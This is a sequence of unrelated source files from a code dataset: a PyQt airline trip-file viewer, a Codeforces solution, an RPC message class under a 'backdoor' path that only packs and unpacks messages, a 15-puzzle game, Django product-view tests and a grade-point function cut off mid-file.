# initialise the start index to 0, i.e the start of the string\n splitIndexStart = string.find('Trip') # find first trip description starting point\n if splitIndexStart == -1: # If the file doesn't have any 'Trip' strings within it\n print('File doesnt contain any trip descriptions') # file doesn't contain any trip descriptions\n fileEnd == True\n\n tripIndex = 0 # initialise the tripIndexCounter\n tripList = [] # initialise trip object list\n\n while not fileEnd: # loop through all trip description blocks in the file\n splitIndexEnd = string.find('Trip', splitIndexStart + 4) # find index of next 'Trip' description\n if splitIndexEnd == -1: # if there are no other occurrences of 'Trip', i.e this is the last trip in the file\n print('This is the last trip description in the file') # This is the last trip description\n tripString = string[splitIndexStart:]\n fileEnd = True\n else:\n tripString = string[splitIndexStart:splitIndexEnd]\n splitIndexStart = splitIndexEnd\n # print(tripString)\n # print('')\n # print('')\n # print('')\n\n # Determine what dates the flight operates on\n regularityRaw = re.findall('(\\d{2}[A-Z]{3}\\d{2})\\s+(\\d{2}[A-Z]{3}\\d{2})\\s+(([\\.|MTWJFSZ]\\s){7})', tripString,\n re.MULTILINE)\n regularityRaw = [list(l) for l in regularityRaw] # convert to a nested list from a nested tuple\n\n for row in regularityRaw: # remove the last element in each list as the finall regex function returns one too many groups\n del row[3]\n\n regularity = createFltRegularity(\n regularityRaw) # decode the list to form a list of dates when the flight operates\n\n # ###extract header information using regular expressions######\n # Trip Number\n tripNum = re.search('Trip\\s*(\\d{4})', tripString)\n tripNum = tripNum.group(1)\n\n # Report Date\n reportDate = regularity[0] # add the first date from the regularity list\n\n # Report Time\n reportTime = re.search('Report\\s*(\\d{4})', tripString)\n reportTime = reportTime.group(1)\n reportTime = datetime.time(datetime.strptime(reportTime, '%H%M'))\n\n # Credit Hours\n crHrs = re.search('CrHr\\s*(\\d{3,4})', tripString)\n crHrs = crHrs.group(1)\n crHrs = str2time(crHrs)\n\n # Previous Trip Number\n tripNumPrev = re.search('PREV\\s*(\\d{4})', tripString)\n if tripNumPrev != None:\n tripNumPrev = tripNumPrev.group(1)\n else:\n tripNumPrev = 'N/A'\n\n # Days in Trip\n days = 
re.search('Days\\s*(\\d+)', tripString)\n days = days.group(1)\n\n # Flying Hours\n flHrs = re.search('FlHr\\s*(\\d{4})', tripString)\n flHrs = flHrs.group(1)\n flHrs = str2time(flHrs)\n\n # Number of Landings\n ldgs = re.search('Ldgs\\s*(\\d+)', tripString)\n ldgs = ldgs.group(1)\n\n # Positioning Hours\n posHrs = re.search('Pos\\s*(\\d{4})', tripString)\n posHrs = posHrs.group(1)\n posHrs = str2time(posHrs)\n\n # Crew Compliment\n crew = re.search('Crew\\s*(\\w+)', tripString)\n crew = crew.group(1)\n\n # Time away from Base hours\n TAFB = re.search('TAFB\\s*(\\d{3,4})', tripString)\n TAFB = TAFB.group(1)\n TAFB = str2time(TAFB)\n\n # Notes\n notes = re.search('Note:\\s*(\\w*)', tripString)\n notes = notes.group(1)\n\n # #### Assemble tripheader list ['Trip Num','Trip Num Prev','Credit Hours','Fl Hours','Ldgs','Pos hrs','Crew','TAFB','Trip Len','Report Date','Report Time']\n tripDataHeader = ['Trip Num', 'Trip Num Prev', 'Credit Hours', 'Fl Hours', 'Ldgs', 'Pos hrs', 'Crew', 'TAFB',\n 'Trip Len', 'Report Date', 'Report Time', 'Notes']\n tripData = [tripNum, tripNumPrev, crHrs, flHrs, ldgs, posHrs, crew, TAFB, days, reportDate, reportTime, notes]\n # add the header to the start of the list\n tripData = [tripDataHeader, tripData]\n\n # ###extract sector data using regular expressions######\n # findall all sectors in the trip description. Result is a list of tuples\n sectList = re.findall(\n '(\\d\\d)\\s+(BA\\s+\\d+|\\w+)\\s+(\\d+|\\w+)\\s+(\\w{3})\\s+(\\d{4})\\s+(\\w{3})\\s+(\\d{4})\\s+(\\d+:\\d+)\\s+(\\w*)',\n tripString, re.MULTILINE)\n\n # convert list of tuples into lists of lists\n sectData = [list(elem) for elem in sectList]\n\n # DEBUG - check to see whether regular expression has found any sector data\n if not sectData:\n print('sectData is empty for some reason')\n\n # convert data to correct types\n for sect in sectData:\n # remove spaces from flight number string\n newStr = sect[1].replace(' ', '')\n sect[1] = newStr\n\n # Convert flight dep and arr times and flHrs to datetime objects\n sectDepTime = datetime.time(datetime.strptime(sect[4], '%H%M'))\n sect[4] = sectDepTime\n\n sectArrTime = datetime.time(datetime.strptime(sect[6], '%H%M'))\n sect[6] = sectArrTime\n\n sectFlHrs = str2time(sect[7])\n sect[7] = sectFlHrs\n\n # add the header to the start of the list\n sectDataHeader = ['Day', 'Flt Number', 'A/C Type', 'Dept Stn', 'Dept Time', 'Arr Stn', 'Arr Time', 'Fl Hrs',\n 'Meal']\n sectData = [sectDataHeader, sectData]\n\n # ###extract sector Totals data using regular expressions######\n sectTotList = re.findall('(S l i p)\\s+(\\w+)\\s+(\\d{3,4})\\s+Duty:\\s+(\\d+:\\d+)\\s+(\\d+:\\d+)\\s+(\\d+:\\d+)',\n tripString, re.MULTILINE)\n\n # convert list of tuples into lists of lists\n sectTotData = [list(elem) for elem in sectTotList]\n\n # Check to see whether regular expression has found any sector Tot data. 
If not then there isn't a slip, i.e it's a day trip\n if not sectTotData:\n print('sectTotData is empty as it\\'s a day trip')\n else:\n # convert data to correct types\n for sect in sectTotData:\n # convert Slip to boolean\n if sect[0] == 'S l i p':\n sect[0] = True\n else:\n sect[0] = False\n\n # Convert slip, FlHrs, Duty period and credit hours to datetime objects\n slipTime = str2time(sect[2])\n sect[2] = slipTime\n\n FlHrs = str2time(sect[3])\n sect[3] = FlHrs\n\n dutyHrs = str2time(sect[4])\n sect[4] = dutyHrs\n\n crHrs = str2time(sect[5])\n sect[5] = crHrs\n\n # add the header to the start of the list\n sectTotDataHeader = ['Slip?', 'Slip Dest', 'Slip Time', 'Tot Fl Hrs', 'Dty Prd', 'Credit Hrs']\n sectTotData = [sectTotDataHeader, sectTotData]\n\n # ###extract trip overall Totals data using regular expressions######\n tripTotList = re.findall('Duty:\\s+(\\d+:\\d+)\\s+(\\d+:\\d+)\\s+(\\d+:\\d+)', tripString, re.MULTILINE)\n\n # convert list of tuples into lists of lists\n tripTotData = [list(elem) for elem in tripTotList]\n\n # Convert total FlHrs, total Duty period and total credit hours to datetime objects\n FlHrs = str2time(tripTotData[0][0])\n tripTotData[0][0] = FlHrs\n\n dutyHrs = str2time(tripTotData[0][1])\n tripTotData[0][1] = dutyHrs\n\n crHrs = str2time(tripTotData[0][2])\n tripTotData[0][2] = crHrs\n\n # Append the overall total list to the sectTotData list\n # print('sectData=', sectData)\n sectTotData.append(tripTotData[0])\n\n # print('tripData= ', tripData)\n # print('')\n # print('')\n # print('sectTotData=', sectTotData)\n\n # Create the trip Object\n tripList.append(trip(tripData, sectData, sectTotData))\n # print(tripList[tripIndex].tripNum)\n tripIndex += 1 # increment the trip index\n\n # create a duplicate trip object for each date in the regularity list\n for dates in regularity[1:]:\n tripCopy = copy.deepcopy(tripList[tripIndex - 1])\n # overwrite the reportDate attribute with the next date in the regularity list\n tripCopy.reportDate = dates\n tripList.append(tripCopy)\n\n return [rawText, tripList]\n\n\n#### Sort functions ####\n# sort by trip length\ndef sortTripLength(tripList):\n tripListSorted = sorted(tripList, key=attrgetter('crHrs', 'tripLen'))\n return tripListSorted\n\n\ndef writeSortedList(sortedList, filename):\n # write the sorted list to a file\n with open(filename, 'w') as file:\n totStr = 'Total Number of Trips = ' + str(len(sortedList)) + '\\n'\n file.write(totStr)\n for obj in sortedList:\n strLine = str(obj.reportDate) + ', ' + str(obj.tripNum) + ', ' + str(obj.crHrs) + ', ' + str(\n obj.tripLen) + '\\n'\n file.write(strLine)\n\n\nclass mainWindow(QMainWindow):\n\n def __init__(self):\n\n # call the parent initialisation\n super().__init__()\n\n # create the main window\n self.createMainWindowUI()\n\n def createMainWindowUI(self):\n\n # create main window\n self.setWindowTitle('BA Trip Viewer')\n\n # self.layout = QVBoxLayout(self)\n\n # store screen geometry\n screen = QDesktopWidget().screenGeometry()\n\n # set main window icon\n self.setWindowIcon(QIcon('icons/Air-Plane-icon.png'))\n\n # create the status bar\n self.statusBar().showMessage('Application Ready')\n\n # Create menubar/toolbar action items\n openAction = QAction(QIcon('icons/open-file-icon.png'), 'Open', self)\n openAction.setStatusTip('Open a BA Trip Description File')\n openAction.setToolTip('Opens a BA Trip Description File')\n openAction.triggered.connect(self.openFile)\n\n saveAction = QAction(QIcon('icons/save-file-icon.png'), 'Save', self)\n 
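# editorial note: each QAction bundles an icon, a caption, a status/tool tip and a slot; the same action\n # objects are attached to both the File menu and the toolbar further down.\n 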
saveAction.setStatusTip('Save BATripViewer session')\n saveAction.setToolTip('Save BATripViewer session')\n saveAction.triggered.connect(self.saveFile)\n\n closeAction = QAction(QIcon('icons/close-file-icon.png'), 'Close', self)\n closeAction.setStatusTip('Close Trip Description file and data')\n closeAction.setToolTip('Close Trip Description file and data')\n closeAction.triggered.connect(qApp.quit) # needs changing to something sensible\n\n exitAction = QAction(QIcon('icons/exit-file-icon.png'), '&Exit', self)\n exitAction.setStatusTip('Exit Application')\n exitAction.setToolTip('Exits the application')\n exitAction.triggered.connect(qApp.quit) # needs changing to something sensible\n\n # create a menubar and add menu items\n menubar = self.menuBar()\n fileMenu = menubar.addMenu('&File')\n\n # add actions to the menu items\n fileMenu.addAction(openAction)\n fileMenu.addAction(saveAction)\n fileMenu.addAction(closeAction)\n fileMenu.addAction(exitAction)\n\n # create a toolbar and assign actions\n topToolbar = self.addToolBar('fileItems')\n topToolbar.addAction(openAction)\n topToolbar.addAction(saveAction)\n topToolbar.addAction(closeAction)\n\n # create a tab widget and set it to be the central widget\n self.tabWidget = QTabWidget()\n self.setCentralWidget(self.tabWidget)\n self.tab1 = QWidget()\n self.tab2 = QWidget()\n self.tab3 = QWidget()\n\n # create tabs\n self.tabWidget.addTab(self.tab1, 'Trip Raw Data File')\n self.tabWidget.addTab(self.tab2, 'Trip List View')\n self.tabWidget.addTab(self.tab3, 'Trip Timeline View')\n\n # create tab content for tab1\n self.tab1.layout = QVBoxLayout(self)\n self.tripRaw_textEdit = QTextEdit()\n self.tab1.layout.addWidget(self.tripRaw_textEdit)\n self.tab1.setLayout(self.tab1.layout)\n\n # create tab content for tab2\n self.tab2.layout = QVBoxLayout(self)\n self.tripList_listView = QListView()\n self.tab2.layout.addWidget(self.tripList_listView)\n self.tab2.setLayout(self.tab2.layout)\n\n # create tab content for tab3\n self.tab3.layout = QVBoxLayout(self)\n self.tripTimeline_textEdit = QTextEdit() # custom widget required for this?\n self.tab3.layout.addWidget(self.tripTimeline_textEdit)\n self.tab3.setLayout(self.tab3.layout)\n\n # create a left aligned dock widget and create the controls\n self.dockWidget = QDockWidget(self)\n self.dockWidget.setObjectName(\"dockWidget\")\n\n # create widget content subclass in order to resize correctly\n class dockWidgetContentLeft(QWidget):\n def sizeHint(self):\n # obtain QCalendar width\n temp = QCalendarWidget()\n calGeom = temp.geometry()\n calWidth = calGeom.width()\n return QSize(calWidth + 200, 0) # set left dock width to calendar width + 200\n\n self.dockWidgetContents = dockWidgetContentLeft()\n # self.dockWidgetContents = QWidget()\n self.dockWidgetContents.setObjectName(\"dockWidgetContents\")\n self.dockWidget.setWidget(self.dockWidgetContents)\n self.addDockWidget(Qt.DockWidgetArea(1), self.dockWidget)\n # self.dockWidget.setGeometry(0, 0, 778, 685)\n\n self.verticalLayoutWidget = QWidget(self.dockWidgetContents)\n # self.verticalLayoutWidget.setGeometry(QRect(0, 0, 778, 685))\n self.verticalLayoutWidget.setObjectName(\"verticalLayoutWidget\")\n self.verticalLayout = QVBoxLayout(self.verticalLayoutWidget)\n self.verticalLayout.setContentsMargins(50, 50, 50, 50)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.checkBox_2 = QCheckBox(self.verticalLayoutWidget)\n self.checkBox_2.setObjectName(\"checkBox_2\")\n self.verticalLayout.addWidget(self.checkBox_2)\n self.checkBox_3 = 
QCheckBox(self.verticalLayoutWidget)\n self.checkBox_3.setObjectName(\"checkBox_3\")\n self.verticalLayout.addWidget(self.checkBox_3)\n self.checkBox = QCheckBox(self.verticalLayoutWidget)\n self.checkBox.setObjectName(\"checkBox\")\n self.verticalLayout.addWidget(self.checkBox)\n self.dateTimeEdit = QDateTimeEdit(self.verticalLayoutWidget)\n self.dateTimeEdit.setObjectName(\"dateTimeEdit\")\n self.verticalLayout.addWidget(self.dateTimeEdit)\n self.calendarWidget = QCalendarWidget(self.verticalLayoutWidget)\n self.calendarWidget.setObjectName(\"calendarWidget\")\n self.verticalLayout.addWidget(self.calendarWidget)\n self.dockWidget.setWidget(self.dockWidgetContents)\n\n\n # create widget content subclass in order to resize correctly\n class dockWidgetContentBottom(QWidget):\n def sizeHint(self):\n return QSize(0, 500) # set bottom dock height to 500\n\n # create a bottom aligned dock widget\n self.dockWidget_2 = QDockWidget(self)\n self.dockWidget_2.setObjectName(\"dockWidget_2\")\n self.dockWidgetContents_2 = dockWidgetContentBottom()\n self.dockWidgetContents_2.setObjectName(\"dockWidgetContents_2\")\n self.dockWidget_2.setWidget(self.dockWidgetContents_2)\n self.addDockWidget(Qt.DockWidgetArea(8), self.dockWidget_2)\n\n\n\n\n # add a calendar widget to the left aligned dock widget\n\n\n # # create push button\n # btn = QPushButton(self)\n # btn.setGeometry(200, 200, 200, 50)\n # btn.setText('Quit')\n # btn.setToolTip('This is a button that closes the window')\n\n # button clicked event\n # btn.clicked.connect(QApplication.instance().quit)\n\n # show the window\n self.show()\n\n # maximise the main window\n self.showMaximized()\n\n def openFile(self):\n\n # filter just .txt files\n filter = 'Txt File (*.txt)'\n\n # set home directory\n home_directory = os.getcwd()\n\n fname = QFileDialog.getOpenFileName(self, 'Open BA Trip Description File', home_directory, filter)\n\n if fname[0]:\n\n # read the trip description file\n tripFileData = openTripDescriptionFile(fname[0])\n\n # load the raw data part into the text edit box on the Trip Raw Data file tab\n x = str(tripFileData[0])\n self.tripRaw_textEdit.setText(x)\n # self.tripRaw_textEdit.setText('Hello')\n\n # create a model for the list and load the processed list of trip objects into the list view on the trip List tab\n model = QStandardItemModel(self.tripList_listView)\n for obj in tripFileData[1]:\n # item = QStandardItem(i)\n itemText = str(obj.tripNum) + ', ' + str(obj.reportDate) + ', ' + str(obj.crHrs) + ', ' + str(obj.tripLen)\n item = QStandardItem(itemText)\n item.setCheckable(True)\n\n # colour the item depending on trip length\n if obj.tripLen == '1':\n item.setBackground(QColor(0, 255, 0)) # green\n elif obj.tripLen == '2':\n item.setBackground(QColor(0, 0, 255)) # blue\n elif obj.tripLen == '3':\n item.setBackground(QColor(255, 255, 0)) # yellow\n elif obj.tripLen == '4':\n item.setBackground(QColor(124, 124, 124)) # grey\n elif obj.tripLen == '5':\n item.setBackground(QColor(255, 0, 0)) # red\n # else:\n # item.setBackground(QColor(255, 255, 255)) # white\n\n model.appendRow(item)\n\n # apply the model to the list\n self.tripList_listView.setModel(model)\n\n # make the items not editable\n self.tripList_listView.setEditTriggers(QAbstractItemView.NoEditTriggers)\n\n # make the background colour light blue\n\n\n def saveFile(self):\n\n # filter just .BTV files\n filter = 'BTV File (*.btv)'\n\n # set home directory\n home_directory = os.getcwd()\n\n fname = QFileDialog.getSaveFileName(self, 'Save BA Trip Viewer 
File', home_directory, filter)\n\n if fname[0]:\n f = open(fname[0], 'w')\n\n with f:\n data = 'TBA' # write routine goes here; in the meantime write the 'TBA' placeholder\n f.write(data)\n\n\n\nif __name__ == '__main__':\n # generate the application\n app = QApplication(sys.argv)\n\n # generate the window object\n w = mainWindow()\n\n # run the application\n sys.exit(app.exec_())","sub_path":"BATripViewer.py","file_name":"BATripViewer.py","file_ext":"py","file_size_in_byte":25268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"28250636","text":"def town():\r\n x1, y1= [int(i) for i in input().split()]\r\n x2, y2= [int(i) for i in input().split()]\r\n n= int(input())\r\n ans= 0\r\n for i in range(n):\r\n a, b, c= [int(k) for k in input().split()]\r\n if (a*x1 + b*y1 + c< 0 and a*x2 + b*y2 + c> 0) or (a*x1 + b*y1 + c> 0 and a*x2 + b*y2 + c< 0):\r\n ans+= 1\r\n \r\n print(ans)\r\n return \r\n\r\ntown()","sub_path":"Codeforces/codeforces #284/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"114776615","text":"from StructHelper import StructHelper\r\nimport struct\r\n\r\nclass ServerMethod:\r\n def __init__(self, id, name, args):\r\n self.id = id\r\n self.name = name\r\n self.args = args\r\n self.isStarted = False\r\n self.hasFinished = False\r\n self.result = None\r\n self.hasError = False\r\n self.errorMessage = \"\"\r\n \r\n @staticmethod\r\n def createFromRunMethodMessage(message_data):\r\n # extract method ID (unpack returns a tuple, and expects exactly 4 bytes for \"!I\")\r\n id = struct.unpack(\"!I\", message_data[:4])[0]\r\n message_data = message_data[4:]\r\n \r\n # extract method name\r\n name, message_data = StructHelper.extractNullTerminatedString(message_data)\r\n \r\n # remaining method data represents the args\r\n args = message_data\r\n \r\n return ServerMethod(id, name, args)\r\n \r\n def setError(self, errMsg):\r\n self.hasError = True\r\n self.errorMessage = errMsg\r\n self.hasFinished = True\r\n \r\n def setResult(self, result):\r\n if result is None:\r\n self.setError(\"Server method '{0}' has been called, but returned no result\".format(self.name))\r\n return\r\n self.result = result\r\n self.hasFinished = True\r\n \r\n def createResponse(self):\r\n # this should only be called when the server method finished execution (we don't check this condition)\r\n response = struct.pack(\"!I\", self.id)\r\n if self.hasError:\r\n response += struct.pack(\"!B{0}sx\".format(len(self.errorMessage)), 1, self.errorMessage)\r\n return response\r\n \r\n response += struct.pack(\"!B\", 0)\r\n response += self.result\r\n return response","sub_path":"hidtools/backdoor/ServerMethod.py","file_name":"ServerMethod.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"33872286","text":"# -*- coding: utf-8 -*-\n\n# `random` module is used to shuffle field, see:\n# https://docs.python.org/3/library/random.html#random.shuffle\nimport random\nimport sys\n\n__author__ = 'skorenev'\n\nif sys.version_info[0] == 2:\n input_function = raw_input\nelse:\n input_function = input\n\n# Empty tile, there's only one empty cell on a field:\nEMPTY_MARK = 'x'\n\n# Dictionary of possible moves in a form of:\n# key -> delta to move the empty tile on a field.\nMOVES = {\n 'w': -4,\n 's': 4,\n 'a': -1,\n 'd': 1,\n}\n\n\ndef shuffle_field():\n \"\"\"\n This method is used to create a field at the very start of the game.\n :return: list with 16 randomly shuffled 
tiles,\n one of which is an empty space.\n \"\"\"\n game_field_ = [\n 1, 2, 3, 4,\n 5, 6, 7, 8,\n 9, 10, 11, 12,\n 13, 14, 15, EMPTY_MARK\n ]\n\n for i in range(len(game_field_)):\n random_ = random.randrange(15)\n game_field_[i], game_field_[random_] = \\\n game_field_[random_], game_field_[i]\n\n # Is it possible to solve? http://pyatnashki.wmsite.ru/kombinacyi\n result_check = 1\n for element in game_field_:\n if isinstance(element, int):\n for j in range(game_field_.index(element), len(game_field_)):\n if isinstance(game_field_[j], int):\n if element > game_field_[j]:\n result_check += 1\n else:\n result_check += game_field_.index(EMPTY_MARK) // 4 # add row of 'x'\n\n print('shuffle try')\n\n if result_check % 2 != 0:\n print('combination couldn\\'t be solved')\n game_field_ = shuffle_field() # reshuffle and keep the solvable result\n\n return game_field_\n\n\ndef print_field(field):\n \"\"\"\n This method prints field to user.\n :param field: current field state to be printed.\n :return: None\n \"\"\"\n for i in range(0, 4):\n print('-' * 21)\n output = '|'\n for j in range(0, 4):\n # print (i*4+j)\n if len(str(field[i * 4 + j])) > 1:\n output += ' ' + str(field[i * 4 + j]) + ' |'\n else:\n output += ' ' + str(field[i * 4 + j]) + ' |'\n print(output)\n print('-' * 21)\n\n\n\ndef is_game_finished(field):\n \"\"\"\n This method checks if the game is finished.\n :param field: current field state.\n :return: True if the game is finished, False otherwise.\n \"\"\"\n\n game_field_ = [\n 1, 2, 3, 4,\n 5, 6, 7, 8,\n 9, 10, 11, 12,\n 13, 14, 15, EMPTY_MARK\n ]\n if field == game_field_:\n result = True\n print ('You\\'ve won!')\n else:\n result = False\n return result\n\n\ndef perform_move(field, key):\n \"\"\"\n Moves empty-tile inside the field.\n :param field: current field state.\n :param key: move direction.\n :return: new field state (after the move).\n :raises: IndexError if the move can't be done.\n \"\"\"\n # print_field(field)\n current_position = field.index(EMPTY_MARK)\n new_position = field.index(EMPTY_MARK) + MOVES[key]\n # print(new_position, (new_position+1)%4+MOVES[key])\n if (new_position < 0) or \\\n ((current_position + 1) % 4 + MOVES[key]) == 0 or \\\n (((new_position) % 4) == 0 and (current_position + 1) % 4 == 0):\n raise IndexError\n field[current_position], field[current_position + MOVES[key]] = \\\n field[current_position + MOVES[key]], field[current_position]\n return field\n\n\ndef handle_user_input():\n \"\"\"\n Handles user input. List of accepted moves:\n 'w' - up,\n 's' - down,\n 'a' - left,\n 'd' - right\n :return: current move.\n \"\"\"\n move = input_function(\"Make your move ('{}') :\".format(\n '\\', \\''.join(MOVES.keys())))\n if move not in MOVES.keys():\n print('Wrong key!')\n move = handle_user_input()\n else:\n print(\"Your move: \", move)\n return move\n\n\ndef main():\n \"\"\"\n The main method. 
It stars when the program is called.\n It also calls other methods.\n :return: None\n \"\"\"\n print('\\n' * 80)\n field = shuffle_field()\n print_field(field)\n steps = 0\n while not is_game_finished(field):\n try:\n key = handle_user_input()\n print('\\n' * 80)\n perform_move(field, key)\n steps += 1\n print_field(field)\n except IndexError:\n print('Wrong move!')\n print_field(field)\n except KeyboardInterrupt:\n print('\\nShutting down\\n')\n sys.exit()\n print ('You\\'ve made {}'.format(steps))\n\nif __name__ == '__main__':\n # See what this means:\n # http://stackoverflow.com/questions/419163/what-does-if-name-main-do\n\n main()\n","sub_path":"homework_02/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"166612280","text":"from datetime import date, timedelta\n\nfrom django.test import Client, TransactionTestCase\nfrom django.urls import reverse\nfrom django.db import connection\n\nfrom product.models import (\n Product,\n ProductSubImage,\n MainCategory,\n SubCategory,\n Difficulty,\n Chapter,\n Community,\n Signature\n)\nfrom user.models import User\nfrom kit.models import Kit\nfrom core.utils import issue_token\n\nclass TestProductDetailView(TransactionTestCase):\n \n @classmethod\n def setUpTestData(cls):\n pass\n \n def setUp(self):\n self.client = Client()\n \n self.PRODUCT_NOT_EXIST = 'PRODUCT_NOT_EXIST'\n \n self.main_categories = MainCategory.objects.create(\n id = 1,\n name = '크리에이티브'\n )\n \n self.sub_categories = SubCategory.objects.create(\n id = 11,\n name = '데이터/개발'\n )\n \n self.difficulty = Difficulty.objects.create(\n name = '초급자'\n )\n \n self.kit = Kit.objects.create(\n name = 'test_kit',\n main_image_url = 'image_url',\n price = 10000,\n description = 'test_description'\n )\n \n self.creator = User.objects.create(\n name = '송은우',\n nick_name = '신의 코드 송은우',\n is_creator = True\n )\n \n self.user = User.objects.create(\n name = '김민구',\n nick_name = '민구좌',\n password = '1234',\n is_creator = False\n )\n\n token = issue_token(self.user.id)\n \n self.header = {\n 'HTTP_Authorization': token,\n }\n \n self.signature = Signature.objects.create(\n name = '기용좌'\n )\n \n self.product = Product.objects.create(\n name = '퇴근 후 함께 즐기는 코딩 모임! 
직장인을 위한 취미반, 함께해요!',\n effective_time = timedelta(days=30),\n price = 10000.00,\n sale = 0.05,\n start_date = date.today(),\n thumbnail_image = 'test_thumbnail_image_url',\n main_category = self.main_categories,\n sub_category = self.sub_categories,\n difficulty = self.difficulty,\n creator = self.creator\n )\n \n self.product.kit.add(self.kit)\n \n for i in range(3):\n ProductSubImage.objects.create(\n image_url = 'test_url' + str(i),\n product_id = self.product.id\n )\n \n for i in range(3, 0, -1):\n Chapter.objects.create(\n name = 'chapter' + str(i),\n product_id = self.product.id,\n order = i,\n thumbnail_image = 'image_url'\n )\n \n for i in range(10, 0, -1):\n Community.objects.create(\n description='test_community_description' + str(i),\n user_id=self.user.id,\n product_id=self.product.id,\n )\n \n for i in range(3):\n Community.objects.create(\n description = 'test_creator_community_description' + str(i),\n user_id = self.creator.id,\n product_id = self.product.id,\n )\n \n def tearDown(self):\n with connection.cursor() as cursor:\n cursor.execute('set foreign_key_checks=0')\n cursor.execute('truncate main_categories')\n cursor.execute('truncate sub_categories')\n cursor.execute('truncate users')\n cursor.execute('truncate products')\n cursor.execute('truncate chapters')\n cursor.execute('truncate communities')\n cursor.execute('truncate users_coupons')\n cursor.execute('truncate coupons')\n cursor.execute('truncate difficulties')\n cursor.execute('truncate kits')\n cursor.execute('truncate recently_views')\n cursor.execute('set foreign_key_checks=1')\n \n def test_product_detail_get_fail_wrong_product_id(self):\n url = reverse('products', args=[2])\n \n response = self.client.get(\n url, content_type='application/json'\n )\n \n self.assertEqual(response.status_code, 400)\n self.assertEqual(\n response.json()['MESSAGE'],\n self.PRODUCT_NOT_EXIST\n )\n \n def test_product_detail_get_fail_product_deleted(self):\n url = reverse('products', args=[1])\n \n self.product.is_deleted = True\n self.product.save()\n \n response = self.client.get(\n url, content_type='application/json'\n )\n \n self.assertEqual(response.status_code, 400)\n self.assertEqual(\n response.json()['MESSAGE'],\n self.PRODUCT_NOT_EXIST\n )\n \n def test_product_detail_get_success_with_no_token(self):\n url = reverse('products', args=[1])\n \n response = self.client.get(url, content_type='application/json')\n \n self.assertEqual(response.status_code, 200)\n self.assertEqual(\n response.json()['CLASS']['classId'],\n 1\n )\n \n def test_product_detail_get_success_with_token(self):\n url = reverse('products', args=[1])\n \n response = self.client.get(\n url,\n content_type='application/json',\n **self.header\n )\n \n self.assertEqual(response.status_code, 200)\n self.assertEqual(\n response.json()['CLASS']['classId'],\n 1\n )\n\n def test_product_detail_get_success_with_token_display_is_like(self):\n url = reverse('products', args=[1])\n \n self.user.product_like.add(self.product)\n \n response = self.client.get(\n url,\n content_type='application/json',\n **self.header\n )\n \n self.assertEqual(response.status_code, 200)\n \n self.assertEqual(\n response.json()['CLASS']['isLike'],\n True\n )\n self.assertEqual(\n response.json()['CLASS']['likeCount'],\n 1\n )\n \n def test_product_detail_product_sub_image_exists(self):\n url = reverse('products', args=[1])\n \n response = self.client.get(url, content_type='application/json')\n \n self.assertEqual(response.status_code, 200)\n self.assertNotEqual(\n 
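The `tearDown` above resets state with raw `TRUNCATE`s because `TransactionTestCase` commits real transactions instead of rolling back; a generic sketch of that pattern, assuming a MySQL backend (the helper name `truncate_tables` is illustrative):

```python
from django.db import connection

def truncate_tables(*tables):
    # foreign key checks must be off while truncating tables that
    # reference each other, exactly as in the record's tearDown
    with connection.cursor() as cursor:
        cursor.execute('SET FOREIGN_KEY_CHECKS=0')
        for table in tables:        # e.g. 'products', 'users', 'kits'
            cursor.execute('TRUNCATE TABLE %s' % table)
        cursor.execute('SET FOREIGN_KEY_CHECKS=1')
```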
response.json()['CLASS']['subImages'],\n []\n )\n \n def test_product_detail_chapters_order_is_valid(self):\n url = reverse('products', args=[1])\n \n response = self.client.get(url, content_type='application/json')\n \n self.assertEqual(response.status_code, 200)\n self.assertEqual(\n [\n curriculums['order']\n for curriculums in response.json()['CLASS']['curriculum']\n ],\n [1, 2, 3]\n )\n \n def test_product_detail_kits_exists(self):\n url = reverse('products', args=[1])\n \n response = self.client.get(url, content_type='application/json')\n \n self.assertEqual(response.status_code, 200)\n self.assertNotEqual(\n response.json()['CLASS']['kitInfo'],\n []\n )\n \n def test_product_detail_community_order_by_updated_at(self):\n url = reverse('products', args=[1])\n \n response = self.client.get(url, content_type='application/json')\n \n self.assertEqual(response.status_code, 200)\n \n self.assertEqual(\n response.json()['CLASS']['community'][0]['communityId'],\n len(response.json()['CLASS']['community'])\n )\n \n def test_display_is_take_class_take_possible_now(self):\n url = reverse('products', args=[1])\n \n response = self.client.get(url, content_type='application/json')\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(\n response.json()['CLASS']['isTakeClass'],\n '바로 수강 가능'\n )\n \n def test_display_is_take_class_take_impossible_now(self):\n url = reverse('products', args=[1])\n \n self.product.start_date = '2020-12-31'\n self.product.save()\n \n response = self.client.get(url, content_type='application/json')\n \n print(response.json()['CLASS']['isTakeClass'])\n \n self.assertEqual(response.status_code, 200)\n self.assertEqual(\n response.json()['CLASS']['isTakeClass'],\n '12월 31일 부터 수강 가능'\n )\n \n def test_display_class_owner_is_user(self):\n url = reverse('products', args=[1])\n \n response = self.client.get(url, content_type='application/json')\n \n self.assertEqual(response.status_code, 200)\n self.assertEqual(\n response.json()['CLASS']['classOwner'],\n '신의 코드 송은우'\n )\n \n def test_display_class_owner_is_signature(self):\n url = reverse('products', args=[1])\n \n self.product.creator = None\n self.product.signature = self.signature\n self.product.save()\n \n response = self.client.get(url, content_type='application/json')\n \n self.assertEqual(response.status_code, 200)\n self.assertEqual(\n '기용좌',\n response.json()['CLASS']['classOwner']\n )\n","sub_path":"product/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":9774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"244525345","text":"# Author: Shakeb Siddiqui sms8508@psu.edu\n\ndef getGradePoint(grade):\n if grade == (\"A\"):\n course1gp=float(4.0)\n elif grade == (\"A-\"):\n course1gp=float(3.67)\n elif grade == (\"B+\"):\n course1gp=float(3.33)\n elif grade == (\"B\"):\n course1gp=float(3.0)\n elif grade == (\"B-\"):\n course1gp=float(2.67)\n elif grade == (\"C+\"):\n course1gp=float(2.330)\n elif grade == (\"C\"):\n course1gp=float(2.0)\n elif grade == (\"D\"):\n course1gp=float(1.0)\n elif grade == 